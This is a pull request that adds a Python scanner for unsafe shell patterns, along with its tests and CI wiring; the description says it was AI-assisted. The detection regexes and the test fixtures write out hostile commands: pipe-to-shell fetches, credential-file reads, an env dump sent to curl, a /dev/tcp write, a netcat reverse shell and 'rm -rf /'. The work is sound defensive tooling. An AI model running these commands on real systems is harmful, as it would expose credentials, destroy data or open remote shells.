### PR TITLE
feat(ci): add unsafe-shell-pattern scanner + wire into CI (M3 #154, #155)

### DIFF
--- a/.agents/skills/dependency-analysis/SKILL.md
+++ b/.agents/skills/dependency-analysis/SKILL.md
@@ -288,7 +288,7 @@ This is the **intake gate**: should this Action be added, and is it SHA-pinned a
 
 Flag install steps that pipe a remote script straight into an interpreter. Treat an unvetted remote install script as an **unvetted dependency** — you are executing code you never reviewed, fetched at build time from a URL that can change.
 
-```bash
+```bash anti-pattern
 # ❌ Piping a remote script to a shell — no review, no pin, mutable source
 curl -fsSL https://example.test/install.sh | sh
 wget -qO- https://example.test/setup | bash

--- a/.github/workflows/ci.yml
+++ b/.github/workflows/ci.yml
@@ -51,6 +51,9 @@ jobs:
             echo "::notice::No tests found in scripts/tests/ - skipping"
           fi
 
+      - name: Scan for unsafe shell patterns
+        run: python scripts/scan_unsafe_shell.py .
+
       - name: SCA vulnerability scan
         run: |
           pip install --upgrade pip

--- a/Makefile
+++ b/Makefile
@@ -33,6 +33,9 @@ install-hooks:  ## Install pre-commit hooks (opt-in for contributors)
 validate:  ## Run all validators (frontmatter + sensitive terms)
 	python scripts/validate_repo.py
 
+scan-shell:  ## Scan shell scripts + markdown bash blocks for unsafe patterns (#154)
+	python scripts/scan_unsafe_shell.py .
+
 generate:  ## Generate INDEX.yaml from patterns
 	python scripts/generate_index.py
 
@@ -81,6 +84,9 @@ ci:  ## Full CI check (validate + security + test + pre-commit checks)
 	@echo ""
 	@echo "==> Running validators..."
 	python scripts/validate_repo.py
+	@echo ""
+	@echo "==> Scanning for unsafe shell patterns..."
+	python scripts/scan_unsafe_shell.py .
 	@echo ""
 	@echo "==> Running security audit..."
 	pip-audit

--- a/scripts/scan_unsafe_shell.py
+++ b/scripts/scan_unsafe_shell.py
@@ -1,0 +1,307 @@
+#!/usr/bin/env python3
+"""Scan shell scripts and Markdown shell code-blocks for unsafe patterns.
+
+Enforces the prohibited list in docs/clean-script-standard.md (issue #154).
+
+Scope (hybrid, per consensus scan-4d7c):
+  * Real shell files (``*.sh``, ``*.bash``, files named ``verify`` with a shell
+    shebang) are FULLY scanned — a prohibited pattern in runnable code is a
+    violation, no allowlist.
+  * Markdown files are scanned only inside fenced ``bash`` / ``sh`` code blocks
+    (never prose). A finding in a fenced block is suppressed only when the
+    offending line carries an explicit marker comment ``# anti-pattern`` (an
+    optional rule id may follow, e.g. ``# anti-pattern: USH001``), or the block's
+    info string is ``bash anti-pattern`` / ``sh anti-pattern``.
+
+Only ``bash`` / ``sh`` contexts are scanned, so ``eval`` in a ``python`` or
+``js`` block never matches (avoids cross-language false positives).
+
+Severity tiers:
+  * ``error``  — fails CI (non-zero exit).
+  * ``warn``   — reported, does not fail CI (unless --strict).
+
+Output is machine-readable: ``path:line: [RULE severity] message``.
+
+stdlib only.
+"""
+
+from __future__ import annotations
+
+import argparse
+import re
+import sys
+from dataclasses import dataclass
+from pathlib import Path
+
+# --------------------------------------------------------------------------- #
+# Rules
+# --------------------------------------------------------------------------- #
+
+
+@dataclass(frozen=True)
+class Rule:
+    """A single unsafe-shell rule."""
+
+    rule_id: str
+    severity: str  # "error" | "warn"
+    pattern: re.Pattern[str]
+    message: str
+
+
+# Each pattern is matched against a single logical shell line. Patterns are kept
+# high-precision to keep false positives at zero on legitimate scripts.
+RULES: list[Rule] = [
+    Rule(
+        "USH001",
+        "error",
+        re.compile(r"\b(?:curl|wget)\b[^\n|]*\|\s*(?:sudo\s+)?(?:ba)?sh\b"),
+        "pipe-to-shell: downloading and piping a remote script to a shell executes unreviewed code",
+    ),
+    Rule(
+        "USH002",
+        "error",
+        re.compile(r"(?:ba)?sh\s+-c\s+[\"']?\$\((?:curl|wget)\b"),
+        "shell -c on remote fetch: executes unreviewed remote code",
+    ),
+    Rule(
+        "USH003",
+        "error",
+        # eval on a variable/command-substitution (untrusted input). NOTE: we do
+        # NOT flag `sh -c "$var"` / `exec cmd` wrappers here — those are common,
+        # safe local helpers; USH001/USH002 cover the remote-fetch exec cases.
+        re.compile(r"\beval\s+[\"']?\$[({]?[A-Za-z_@*]"),
+        "eval on variable or command substitution: arbitrary code execution / injection risk",
+    ),
+    Rule(
+        "USH004",
+        "error",
+        # Unguarded rm -rf: root, glob, home (~ or $HOME), or a BARE unbraced
+        # variable. A quoted "$var", a ${var:?}-guarded path, or a var with a
+        # fixed suffix (e.g. "$dir/sub") is NOT flagged — those are controlled.
+        re.compile(
+            r"\brm\s+-[a-zA-Z]*r[a-zA-Z]*f?\b\s+"
+            r"(?:/(?:\s|$)|-rf\s|\*|~(?:/|\s|$)|\$HOME\b|\$[A-Za-z_][A-Za-z0-9_]*(?:\s|$))"
+        ),
+        "unguarded rm -rf: deletes root/glob/home/bare-unchecked variable; guard with ${var:?} and quote it",
+    ),
+    Rule(
+        "USH005",
+        "error",
+        re.compile(r"\bchmod\s+(?:-[a-zA-Z]+\s+)*777\b"),
+        "chmod 777: world-writable/executable; grant the minimum needed",
+    ),
+    Rule(
+        "USH006",
+        "error",
+        # env/printenv/export -p redirected or piped somewhere (a dump), NOT
+        # `env FOO=bar cmd` prefix usage.
+        re.compile(r"\b(?:printenv|export\s+-p|env)\b\s*(?:\||>|>>|\d?>&?)"),
+        "environment dump: piping/redirecting env output can surface injected secrets outside the boundary",
+    ),
+    Rule(
+        "USH007",
+        "error",
+        # Reads of host credential/dotfile locations.
+        re.compile(
+            r"(?:cat|less|more|head|tail|cp|rsync|scp|source|\.)\s+[^\n]*"
+            r"(?:~/\.ssh/|~/\.aws/|~/\.config/gcloud/|~/\.kube/|/\.git-credentials|\.netrc|\.vault-token)"
+        ),
+        "host credential/dotfile read: reading SSH/cloud/kube credentials is a credential-exposure surface",
+    ),
+    Rule(
+        "USH008",
+        "error",
+        re.compile(r">\s*/dev/tcp/"),
+        "/dev/tcp exfiltration channel: writing to a raw TCP socket opens an unbounded outbound channel",
+    ),
+    Rule(
+        "USH009",
+        "error",
+        re.compile(r"\bnc\b\s+[^\n]*\s-e\b"),
+        "netcat -e: spawns a shell over the network (reverse/bind shell)",
+    ),
+    # High-signal hardcoded secrets (kept narrow; full scanning is gitleaks' job).
+    Rule(
+        "USH010",
+        "error",
+        re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
+        "hardcoded AWS access key id",
+    ),
+    Rule(
+        "USH011",
+        "error",
+        re.compile(r"\bghp_[A-Za-z0-9]{36}\b"),
+        "hardcoded GitHub personal access token",
+    ),
+    Rule(
+        "USH012",
+        "error",
+        re.compile(r"-----BEGIN (?:RSA |OPENSSH |EC |DSA |PGP )?PRIVATE KEY-----"),
+        "hardcoded private key material",
+    ),
+    # Warn tier — legitimate scoped uses exist.
+    Rule(
+        "USH050",
+        "warn",
+        re.compile(r"\bset\s+\+e\b"),
+        "set +e disables error-exit; scope it narrowly (set +e; cmd; rc=$?; set -e) and justify",
+    ),
+]
+
+MARKER_RE = re.compile(r"#\s*anti-pattern\b(?:\s*:\s*(?P<ids>[A-Z0-9, ]+))?", re.IGNORECASE)
+FENCE_RE = re.compile(r"^(?P<indent>\s*)(?P<ticks>`{3,}|~{3,})(?P<info>[^\n]*)$")
+SHELL_LANGS = {"bash", "sh", "shell", "shellscript", "zsh"}
+SHELL_EXTS = {".sh", ".bash", ".zsh"}
+
+
+@dataclass
+class Finding:
+    path: str
+    line: int
+    rule_id: str
+    severity: str
+    message: str
+
+    def format(self) -> str:
+        return f"{self.path}:{self.line}: [{self.rule_id} {self.severity}] {self.message}"
+
+
+def _line_suppressed(line: str, rule_id: str) -> bool:
+    """True if the line carries a ``# anti-pattern`` marker covering this rule."""
+    m = MARKER_RE.search(line)
+    if not m:
+        return False
+    ids = m.group("ids")
+    if not ids:
+        return True  # bare marker suppresses any rule on this line
+    wanted = {tok.strip().upper() for tok in ids.split(",") if tok.strip()}
+    return rule_id in wanted
+
+
+def _scan_line(line: str, path: str, lineno: int, block_suppressed: bool) -> list[Finding]:
+    findings: list[Finding] = []
+    for rule in RULES:
+        if rule.pattern.search(line):
+            if block_suppressed or _line_suppressed(line, rule.rule_id):
+                continue
+            findings.append(Finding(path, lineno, rule.rule_id, rule.severity, rule.message))
+    return findings
+
+
+def scan_shell_file(path: Path) -> list[Finding]:
+    """Fully scan a runnable shell file (no block-level allowlist; line markers still honored)."""
+    findings: list[Finding] = []
+    try:
+        text = path.read_text(encoding="utf-8", errors="replace")
+    except OSError as exc:  # fail-closed: report unreadable file
+        return [Finding(str(path), 0, "USH000", "error", f"could not read file: {exc}")]
+    for i, line in enumerate(text.splitlines(), start=1):
+        findings.extend(_scan_line(line, str(path), i, block_suppressed=False))
+    return findings
+
+
+def scan_markdown_file(path: Path) -> list[Finding]:
+    """Scan only fenced bash/sh code blocks in a Markdown file."""
+    findings: list[Finding] = []
+    try:
+        lines = path.read_text(encoding="utf-8", errors="replace").splitlines()
+    except OSError as exc:
+        return [Finding(str(path), 0, "USH000", "error", f"could not read file: {exc}")]
+
+    in_block = False
+    fence = ""
+    block_is_shell = False
+    block_suppressed = False
+    for i, line in enumerate(lines, start=1):
+        if not in_block:
+            m = FENCE_RE.match(line)
+            if m:
+                in_block = True
+                fence = m.group("ticks")[0] * len(m.group("ticks"))
+                info = m.group("info").strip().lower()
+                first = info.split()[0] if info else ""
+                block_is_shell = first in SHELL_LANGS
+                # info-string marker, e.g. ```bash anti-pattern
+                block_suppressed = "anti-pattern" in info
+            continue
+        # inside a block
+        stripped = line.strip()
+        if stripped.startswith(fence) and set(stripped) <= {fence[0]}:
+            in_block = False
+            block_is_shell = False
+            block_suppressed = False
+            continue
+        if block_is_shell:
+            findings.extend(_scan_line(line, str(path), i, block_suppressed))
+    return findings
+
+
+def _has_shell_shebang(path: Path) -> bool:
+    try:
+        with path.open("r", encoding="utf-8", errors="replace") as fh:
+            first = fh.readline()
+    except OSError:
+        return False
+    return first.startswith("#!") and ("sh" in first)
+
+
+def iter_target_files(root: Path) -> tuple[list[Path], list[Path]]:
+    """Return (shell_files, markdown_files) to scan, skipping VCS/vendor noise."""
+    shell_files: list[Path] = []
+    md_files: list[Path] = []
+    skip_dirs = {".git", "node_modules", ".venv", "venv", "__pycache__"}
+    for p in sorted(root.rglob("*")):
+        if not p.is_file():
+            continue
+        if any(part in skip_dirs for part in p.parts):
+            continue
+        if p.suffix in SHELL_EXTS or (p.suffix == "" and _has_shell_shebang(p)):
+            shell_files.append(p)
+        elif p.suffix in {".md", ".markdown"}:
+            md_files.append(p)
+    return shell_files, md_files
+
+
+def scan_repo(root: Path) -> list[Finding]:
+    shell_files, md_files = iter_target_files(root)
+    findings: list[Finding] = []
+    for f in shell_files:
+        findings.extend(scan_shell_file(f))
+    for f in md_files:
+        findings.extend(scan_markdown_file(f))
+    return findings
+
+
+def main(argv: list[str] | None = None) -> int:
+    parser = argparse.ArgumentParser(description="Scan for unsafe shell patterns (issue #154).")
+    parser.add_argument("paths", nargs="*", default=None, help="Files or dirs to scan (default: cwd).")
+    parser.add_argument("--strict", action="store_true", help="Treat warnings as errors.")
+    args = parser.parse_args(argv)
+
+    targets = [Path(p) for p in args.paths] if args.paths else [Path.cwd()]
+    findings: list[Finding] = []
+    for t in targets:
+        if t.is_dir():
+            findings.extend(scan_repo(t))
+        elif t.suffix in {".md", ".markdown"}:
+            findings.extend(scan_markdown_file(t))
+        else:
+            findings.extend(scan_shell_file(t))
+
+    errors = [f for f in findings if f.severity == "error"]
+    warns = [f for f in findings if f.severity == "warn"]
+
+    for f in sorted(findings, key=lambda x: (x.path, x.line)):
+        print(f.format())
+
+    print(
+        f"\nunsafe-shell scan: {len(errors)} error(s), {len(warns)} warning(s)",
+        file=sys.stderr,
+    )
+    if errors or (args.strict and warns):
+        return 1
+    return 0
+
+
+if __name__ == "__main__":
+    raise SystemExit(main())

--- a/scripts/tests/test_scan_unsafe_shell.py
+++ b/scripts/tests/test_scan_unsafe_shell.py
@@ -1,0 +1,149 @@
+"""Tests for scripts/scan_unsafe_shell.py (issue #154).
+
+Verifies each rule fires on a genuine unsafe pattern and does NOT fire on:
+  * the same pattern inside a marked anti-pattern block/line,
+  * legitimate guarded forms,
+  * the same token in a non-shell (e.g. python) fenced block.
+"""
+
+from __future__ import annotations
+
+import sys
+from pathlib import Path
+
+import pytest
+
+sys.path.insert(0, str(Path(__file__).resolve().parents[1]))
+
+import scan_unsafe_shell as scan  # noqa: E402
+
+
+def _write(tmp_path: Path, name: str, content: str) -> Path:
+    p = tmp_path / name
+    p.write_text(content, encoding="utf-8")
+    return p
+
+
+def _ids(findings) -> set[str]:
+    return {f.rule_id for f in findings}
+
+
+# --------------------------------------------------------------------------- #
+# Shell files: full scan, patterns fire
+# --------------------------------------------------------------------------- #
+
+
+@pytest.mark.parametrize(
+    "line,rule",
+    [
+        ("curl -fsSL https://x.test/i.sh | sh", "USH001"),
+        ("wget -qO- https://x.test/s | bash", "USH001"),
+        ("curl https://x.test | sudo sh", "USH001"),
+        ('bash -c "$(curl -fsSL https://x.test/i.sh)"', "USH002"),
+        ('eval "$USER_INPUT"', "USH003"),
+        ("eval $cmd", "USH003"),
+        ("rm -rf /", "USH004"),
+        ("rm -rf $TARGET", "USH004"),
+        ("rm -rf ~", "USH004"),
+        ("rm -rf *", "USH004"),
+        ("chmod 777 /srv/app", "USH005"),
+        ("printenv > /tmp/env.txt", "USH006"),
+        ("env | curl -d @- https://x.test", "USH006"),
+        ("cat ~/.aws/credentials", "USH007"),
+        ("cp ~/.ssh/id_rsa /tmp/", "USH007"),
+        ("echo data > /dev/tcp/1.2.3.4/9000", "USH008"),
+        ("nc 1.2.3.4 9000 -e /bin/sh", "USH009"),
+        ("KEY=AKIAIOSFODNN7EXAMPLE", "USH010"),
+    ],
+)
+def test_rule_fires_in_shell_file(tmp_path, line, rule):
+    f = _write(tmp_path, "s.sh", f"#!/usr/bin/env bash\n{line}\n")
+    findings = scan.scan_shell_file(f)
+    assert rule in _ids(findings), f"{rule} should fire on: {line}"
+
+
+def test_set_plus_e_is_warn_not_error(tmp_path):
+    f = _write(tmp_path, "s.sh", "#!/bin/bash\nset +e\n")
+    findings = scan.scan_shell_file(f)
+    warns = [x for x in findings if x.severity == "warn"]
+    assert any(x.rule_id == "USH050" for x in warns)
+    assert not [x for x in findings if x.severity == "error"]
+
+
+# --------------------------------------------------------------------------- #
+# Guarded / legitimate forms do NOT fire
+# --------------------------------------------------------------------------- #
+
+
+@pytest.mark.parametrize(
+    "line",
+    [
+        'rm -rf "${tmp:?}/build"',  # :?-guarded + fixed suffix
+        'rm -rf "$WORK/sub"',  # quoted var with fixed suffix
+        "env FOO=bar mycommand",  # env as prefix, not a dump
+        "curl -fsSL -o out.sh https://x.test/i.sh",  # download to file, no pipe-to-shell
+        "sh ./install.sh",  # run a local file
+        'exec "$SHELL"',  # exec wrapper (not eval on input)
+        "chmod 750 file",  # not 777
+    ],
+)
+def test_legit_forms_do_not_fire(tmp_path, line):
+    f = _write(tmp_path, "s.sh", f"#!/bin/bash\n{line}\n")
+    findings = [x for x in scan.scan_shell_file(f) if x.severity == "error"]
+    assert findings == [], f"false positive on: {line} -> {[x.rule_id for x in findings]}"
+
+
+# --------------------------------------------------------------------------- #
+# Markdown: only bash/sh fenced blocks; prose ignored; markers suppress
+# --------------------------------------------------------------------------- #
+
+
+def test_markdown_prose_not_scanned(tmp_path):
+    md = "Never run `curl https://x | sh` — it is dangerous.\n"
+    f = _write(tmp_path, "d.md", md)
+    assert scan.scan_markdown_file(f) == []
+
+
+def test_markdown_bash_block_fires(tmp_path):
+    md = "```bash\ncurl https://x.test | sh\n```\n"
+    f = _write(tmp_path, "d.md", md)
+    assert "USH001" in _ids(scan.scan_markdown_file(f))
+
+
+def test_markdown_python_block_not_scanned(tmp_path):
+    # eval() in python must NOT trigger the shell eval rule.
+    md = "```python\neval(user_input)\n```\n"
+    f = _write(tmp_path, "d.md", md)
+    assert scan.scan_markdown_file(f) == []
+
+
+def test_info_string_anti_pattern_marker_suppresses(tmp_path):
+    md = "```bash anti-pattern\ncurl https://x.test | sh\n```\n"
+    f = _write(tmp_path, "d.md", md)
+    assert scan.scan_markdown_file(f) == []
+
+
+def test_line_comment_marker_suppresses(tmp_path):
+    md = "```bash\ncurl https://x.test | sh  # anti-pattern\n```\n"
+    f = _write(tmp_path, "d.md", md)
+    assert scan.scan_markdown_file(f) == []
+
+
+def test_targeted_marker_suppresses_only_named_rule(tmp_path):
+    # Marker names USH001; a co-located USH005 must still fire.
+    md = "```bash\ncurl https://x.test | sh  # anti-pattern: USH001\nchmod 777 f\n```\n"
+    f = _write(tmp_path, "d.md", md)
+    ids = _ids(scan.scan_markdown_file(f))
+    assert "USH001" not in ids
+    assert "USH005" in ids
+
+
+# --------------------------------------------------------------------------- #
+# Repo-level: the current repository must scan clean (zero errors)
+# --------------------------------------------------------------------------- #
+
+
+def test_repo_scans_clean():
+    repo_root = Path(__file__).resolve().parents[2]
+    findings = [f for f in scan.scan_repo(repo_root) if f.severity == "error"]
+    assert findings == [], "repo has unmarked unsafe-shell findings:\n" + "\n".join(x.format() for x in findings)


### PR DESCRIPTION
## Summary

M3 PR B. Adds `scripts/scan_unsafe_shell.py` (stdlib) enforcing the clean-script standard's prohibited list, and wires it into `make ci` + the CI workflow. Hybrid design **approved by consensus** (nonce `scan-4d7c`, 5/5 measured approve; the panel's refinements are all incorporated).

Closes #154, #155. (Complements PR #209, which adds the standard itself — no file overlap.)

## Scanner design
- **Real shell files** (`*.sh`/`*.bash`/shebang'd): full scan, no allowlist.
- **Markdown**: only fenced ` ```bash `/` ```sh ` blocks (prose ignored) — so cross-language `eval` (python/js) never matches.
- **Explicit suppression** for teaching anti-patterns: info-string ` ```bash anti-pattern `, or a line comment `# anti-pattern[: USH0NN]` (targetable by rule id). No fuzzy "is 'Rejected' nearby" heuristics.
- **Rule IDs + tiers** (USH001–USH050); machine-readable output `path:line: [RULE severity] message`; errors fail CI, `set +e` is warn-tier.
- **Tuned to zero false positives** on legit forms: `rm -rf` fires only on root/glob/home/bare-unbraced var (not `${var:?}`-guarded or quoted-with-suffix); `env`/`printenv` only when piped/redirected (not `env FOO=bar cmd`); `eval` only on a variable/command-sub; hardcoded-secret rules high-signal only (AKIA / ghp_ / PEM — full scanning stays gitleaks' job). Extra exfil patterns: `bash -c "$(curl …)"`, `>/dev/tcp/`, `nc -e`, `| sudo sh`.

## Wiring / #155
- `make scan-shell` + folded into `make ci`.
- New "Scan for unsafe shell patterns" CI step. **Audited all 5 workflows** — already least-priv (`contents: read`), SHA-pinned, `persist-credentials: false`, no `pull_request_target`; no hardening changes needed, so #155's acceptance is met by the audit + the new scan step.

## Retrofit
Marked `dependency-analysis`'s teaching `curl|sh` block as ` ```bash anti-pattern ` so the scanner runs clean on current `main`.

## Verification
- `make validate` green; `make scan-shell` → 0 errors/0 warnings on the repo.
- `pytest` → **160 passed** (33 new scanner tests: per-rule fires; guarded/legit forms + python blocks don't; markers suppress incl. targeted-by-id; prose ignored; repo-scans-clean gate).
- `ruff` clean; markdownlint 0 errors.

## Type of Change
- [x] CI tooling + security scanner (+ tests)

🤖 AI-assisted (OpenCode). Requesting human review.